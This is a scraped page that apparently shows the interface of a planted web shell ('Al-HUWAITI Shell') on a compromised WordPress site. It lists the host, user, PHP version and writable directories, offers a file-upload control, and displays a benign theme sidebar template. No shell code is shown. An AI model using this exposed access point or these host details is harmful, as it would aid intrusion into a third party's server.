hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : chryzalihi ( 621211)
PHP Version : 8.3.31
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/chryzalihi/www/wp-contentOLD/themes/longevity/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/chryzalihi/www/wp-contentOLD/themes/longevity/sidebar-header.php
<?php

/**
 * Header sidebar above the main menu 
 * @package Longevity
 * 
 */


if (   ! is_active_sidebar( 'header'  )	)

		return;
	// If we get this far, we have widgets. Let do this.
?>

<aside id="header-sidebar-group" class="widget-area">

        <div class="row">
        			
                <div class="col-md-12">
                    <?php dynamic_sidebar( 'header' ); ?>
                </div>
  
        </div>
</aside>

Al-HUWAITI Shell